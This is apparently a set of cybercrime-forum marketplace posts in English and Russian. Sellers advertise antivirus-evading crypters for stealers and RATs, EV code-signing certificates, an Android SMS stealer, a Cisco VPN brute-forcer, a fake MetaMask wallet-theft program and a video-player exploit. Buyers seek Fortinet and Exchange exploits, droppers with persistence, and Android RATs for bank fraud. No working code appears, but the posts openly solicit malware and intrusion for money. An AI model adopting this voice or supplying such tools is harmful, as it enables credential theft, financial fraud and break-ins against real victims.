[ BASIC ] $10/file
· MAIN FOCUS: STEALERS, ANY SINGLE SHOT MALWARE.
· FEATURES
- Single Bullet
- Anti-VM/RDP/Sandbox environments.
- Bypass all browser downloads.
- 0/26 avcheck.
[ STARTUP ] $15/file
· MAIN FOCUS: ANY SPYWARE WHICH REQUIRES PAYLOAD TO RUN EVERY TIME THE DEVICE
IS ON
· FEATURES:
- Same [ BASIC ] Sandbox evasion features.
- Bypass all browser downloads.
- Startup [ appdata ]
- 0/26 avcheck.
[ PREMIUM ] $25/file
· MAIN FOCUS: ANY PAYLOAD WHICH REQUIRES PROCESS TO BE UNKILLABLE [ RATS, C2,
BOTNET, ETC ]
· FEATURES:
- Same [ BASIC ] Sanbox evasion features.
- Bypass all browser downloads.
- Hidden Startup.
- FUD Persistence.
- [ PREMIUM ] only custom loading method.
- Bind any file you want to the final build.
- 0/26 avcheck.
- https://avcheck.net/id/w1rdMvUYBIYQ
What about runtime?
According to scanner.to, our solution successfully bypasses:
Feel free to contact me via xss, or on telegram: https://t.me/dllbof.
Check out other tools in my profile.
Shoyo Group owner.
Все моменты обсудим в личке
Куплю EV сертификат, сделки только через гарант форума.
Spoiler: Закрыто на депозит. Closed for deposit. 1200$
.
Hi guys. I am offering my Private Crypt service here.
**Contact me on Telegram for more information.
Vouched and repped on many forums.
Привет, ребята. Предлагаю здесь услуги частного склепа. **
Свяжитесь со мной в Telegram для получения дополнительной информации.
Подтверждён и зарекомендован на многих форумах
F.A.Q -
Q: Will i need to keep purchasing?
A: No! One purchase per build is enough!
Q: How long will my crypt last?
A: It is hard to say. I would say minimum 6 months, should last very long.
Q: Does detection depend on how I spread?
A: No, it will stay a long time.
Q: Do you issue refunds?
A: All sales are final UNLESS the crypt does not work when tested
———————-
ЧАСТО ЗАДАВАЕМЫЕ ВОПРОСЫ -
Вопрос: Нужно ли мне продолжать покупать?
А: Нет! Одной покупки на сборку достаточно!
В: Как долго прослужит мой склеп?
А: Трудно сказать. Я бы сказал минимум 6 месяцев, должно длиться очень долго.
Вопрос: Зависит ли обнаружение от того, как я распространяюсь?
О: Нет, это останется надолго.
Вопрос: Вы осуществляете возврат средств?
О: Все продажи являются окончательными, ЕСЛИ крипта не работает при
тестировании.
CONTACT ME ON JABBER TOO
I need to hire a stealer to get Facebook cookies.
Chrome has changed its algorithm, so some stealers can no longer get Facebook cookies.
I need to hire a new stealer that can get Facebook cookies.
@myphuong13579
So, I see all of people on here selling EV CERTS. Is there a market for vulnerable drivers on here? More specifically unkown vulnerable drivers in known software that allow you to map your own driver.
And what would you guys pay for it?
The task is to automatically earn money and grow pets. I ask your advice on what good program to use. The program can be paid. @sam60t
I can encrypt android apk and bypass Google Play Protect, escrow is accepted and a demo can be proven. Ready to go!
Functions:
1. More accessible than other cryptocurrencies
2. Android 13/14 tested and running
3. Full 24/7 support to meet your needs and requirements
The RAT setting is also available for user requirements
Под мои нужды ,работа в команде под% и расходники - через гарант
Нужен закреп на боте хороший
Ищу вариант .hta дропера с закрепом файла в автозагрузке (с обходом def)
пишите свой контакт тут или в ЛС
Hello {Update}.
1 - Main Tipoc > I am Looking for any 1-DAY Fortinet FortiGate 120G Series Exploits.
2 - I need a working exploit for CVE-2024-21762.
old {Edit}:
After a bit of searching on the Fortinet forum, I found that 120G may not have
FortiOS Version Vuln to CVE-2023-27997. It looks like the main used os is ->
7.2.9 / 7.4.5
{Update 1}- So Change the Request to > Working ROP for CVE-2023-27997, I will
buy those ROPs.
{Update 2}-The nice person gave me ROPS but I can not make it on the work on
21762 exploits ( the PoC on "assetnote" on the blog dose not even work like
what the author says, Is just a waste of so much time, god damn "Security
Researchers, just waste people time" I bet those clown does not even finish
the job
,
Are we here a JOKE to you? test on FGT_VM64-v7.2.5.F-build1517
(FGT_VM64-v7.2.4.F-build1396-FORTINET.out.ovf)(FGT_VM64-v7.4.2.F-build2571-FORTINET.out.ovf)
, what the exact research says, not even close to finishing, dude if I had
time to fix you code > "assetnote team" I will not here looking for solution).
My BTC is ready. (Send me your desired price.) I only pay via forum escrow.
ищу хорошего и толкового криптора на борт
подписку рассмотрю
а так же буду рад рекомендациям
As you know, kmplayer is one of the best video players in the world and has
many users And we discovered a "use after free" vulnerability from it, which
is exploiting by opening the video file by client "If you are interested in
making a purchase, we can discuss pricing options."
for video poc dm us in telegram
If you need Js exploit loader, Dm me.
I'm looking for someone who has a crypter for my banking virus, if anyone has it send me a dm
боты каждый день идут
EV CodeSign серты свежие; в основном на токенах, бывают и облачные.
CA выдача только Microsoft Included CA Certificate List.
ccadb.my.salesforce-sites.com/microsoft/IncludedCACertificateReportForMSFT
token-based // 4k$
cloud // 2.5k$
удаленный доступ к токену 24/7 на весь срок действия;
облачные рекомендательно под подпись легит файлов;
гарант приветствуется
первый контакт - ПМ
Нужен Андроид ратник под %, ежедневная прибыль 3.000 $
Готов к сотрудничеству на постоянной основе.
Need Android warrior at%, daily profit $3,000
Ready to cooperate on an ongoing basis.
Telegram @ zytcrfv
X137 Управляющая Консоль
X137 Управляющая Консоль — это специально разработанный набор инструментов для пользователей Telegram, предоставляющий расширенные возможности, выходящие за рамки обычных средств. Благодаря функциям, основанным на искусственном интеллекте, удобным командам управления, решениям в области безопасности и передовым плагинам, X137 предлагает беспрецедентный опыт использования Telegram. Этот инструмент позволяет пользователям получить полный контроль над своей активностью в Telegram, решая задачи коммуникации и безопасности на самом высоком уровне.
Основные функции X137
1. Искусственный интеллект (AI): Безграничные технологии
X137 работает на основе API Gemini, модуля искусственного интеллекта, который является неограниченным, настраиваемым и способен мгновенно реагировать. Он обогащен различными наборами данных, включая:
Модуль AI полностью адаптируется к предпочтениям пользователя, предлагая такие
функции, как выбор наборов данных, настройка ответов и управление
разрешениями. Динамические возможности, такие как текст в речь, анимированные
ответы и история бесед, улучшают пользовательский опыт.
2. Расширенная безопасность: Делаем Telegram безопаснее
Модуль безопасности X137 создан для защиты аккаунтов Telegram с помощью следующих функций:
Этот инструмент идеально подходит для защиты даже самых конфиденциальных данных и сред в Telegram.
3. Пользовательские команды: Полный контроль над процессами
X137 оснащен набором команд для полного управления в Telegram:
4. Мощные плагины: Передовые инструменты
X137 преобразует использование Telegram благодаря следующим передовым плагинам и инструментам:
Эти плагины подчеркивают гибкость и универсальность X137.
Примечание:
Не все функции инструмента перечислены здесь. Для полного видео-демо и
детальной документации посетите:
https://t.me/InfosByte/150
https://t.me/InfosByte/152
Контакт в Telegram: @Ex137
бюджет до 1500усд.
первый контакт через ЛС.
Продаю Source APK стиллер под ANDROID
Возможности:
Выкачивание всех СМС с телефона.
Возможность перехвата всех СМС (скрытый режим)
Возможность перехвата всех ПУШЕЙ (скрытый режим)
Возможность отправлять СМС с указанной сим-карты на указанный номер.
Все управление через телеграмм бота
Не требует сервера / хостинга
Rat может обрабатывать внутренние переменные IP:PORT или проверить конкретную ссылку и получить новый контент. IP:PORT простой и может обрабатывать команды cmd и powershell.
и клиентской стороне и может взаимодействовать с конкретным клиентом или взаимодействовать со всеми клиентами в одном
также можно отправить exe конкретному клиенту или всем клиентам
чистый 0 вирус
hello i need script to RCE a ms exchange server, must bypass defender and be
encoded and crypted because target is blocking default exploit
paying u 30$ per target
i just need shell
we will use a sandboxed VPS to test the script, dont try to send me malwares,
lol waste of time
$30 per target, your time to get rich just get me that bypassable script
write me to lan
Ищу того, кто сможет подписать файл, своим сертификатом.
Для обхода Smart Screen и пр.
Если есть у кого то отпишите в пм!срочно!
Продаю билды брутфорсера для CISCO VPN.
+++ Это не скрипт а нативный софт (exe), написанный на чистом Си +
оптимизация.
Так что он выжимает по скорости все что возможно.
+ В виде консольного exe - приложения для любых версий Windows x64;
+ Поддержка многопоточности и новых расширений новых процессоров;
+ Поддержка Socks4/5 прокси-листов или работа без прокси;
+ Автообновление прокси-листа с заданным интервалом;
+ Отсев не валидных прокси;
+ Работа с отдельными словарями User и Password;
+ Работа с комбо-листами [User;Password];
+ Авто сохранение последнего таргета;
+ Watchdog для обеспечения бесперебойности брутфорса;
+ Тонкая настройка количества таргет-потоков и количества потоков на таргет;
+ GeoIP в отчете;
+ Настраиваемый таймаут Cisco VPN;
+ Таргет-лист формата IP:Port, https:Port
+ Автоматический отсев не валидных таргетов (лучше предварительно
воспользоваться моим
чекером)
+ Софт привязывается к Вашему железу, так что реселинг невозможен.
++ Помощь при запуске в работу + поддержка + обновления
+++ Сделка через Гаранта форума.
Связь - сначала через личные сообщения здесь на форуме.
Продаю билды чекера для Cisco VPN.
+++ Это не скрипт а нативный софт под Windows (exe), написанный на чистом Си +
оптимизация.
Так что он выжимает по скорости все что возможно.
+ Скорость на 400 потоках - 120 чеков в сек.
+ В виде консольного exe - приложения для любых версий Windows x64;
+ Поддержка многопоточности и новых расширений новых процессоров;
+ Работа без прокси, т.к. для проверки они не нужны;
+ Автосохранение каждую минуту;
+ Настраиваемый таймаут ответа от Cisco VPN;
+ Таргет-лист формата IP:Port, https:Port
+ Софт привязывается к Вашему железу, так что реселинг невозможен.
+ После чекера легко брутится
моимбрутфорсером
++ Помощь при запуске в работу + поддержка + обновления
+++ Сделка через Гаранта форума.
Связь - сначала через личные сообщения здесь на форуме.
Куплю, аренда или вступим в нормальную приват тиму по работе с андройд ратником. Льем через спам веб-шеллов, есть свои колл-цетры на звонок, работаем по многим банковским направлениям.
Важен: обход black screen, можем сшить с чистой прилой и добавить в GP, обход последних версий андройда.
Перед началом диалога, пожалуйста, будьте готовы к адекватному общению и тестированию инструмента с нашей и вашей стороны.
Продам в одни руки исходники фейка metamask. Поддерживает все chromium-
браузеры (включая Edge) и firefox. Ищет кошелек не по названию расширения, а
по содержимому ldb/snappy-баз данных или log (если меется) - никаких жестко
закодированных путей. При запуске блокирует браузер и требует обновить пароль
в целях безопасноти - никаких запросов секертных фраз и лишних подозрений.
После ввода пароля пытается расшифровать хранилище и в случае успеха выводит
содержимое на экран (см. ниже). Язык - Си. Реализовано на opengl и winapi,
причина простая - не умею рисовать лендинги, без проблем и бесплатно переделаю
на webview2 с вашим лендингом. Работает в отдельном exe с текущими правами, не
требует повышения, внешних драйверов или dll для хука окон. Также помогу с
адаптацией кода под ваш проект. За доп. плату добавлю любой интересующий
кошелек/расширение. Строго через местного гаранта, кому интересно - в лс.
Примеры работы. Chrome:
Firefox:
Куплю или возьму в аренду ратник для андроид. Обязательно наличие VNC и возможность установки black screen.
Craxs и его производные - мимо. Сделка только через гаранта форума, скамеры не тратьте свое и мое время. Продавцов паблика также это касается.
Первый контакт в ПМ.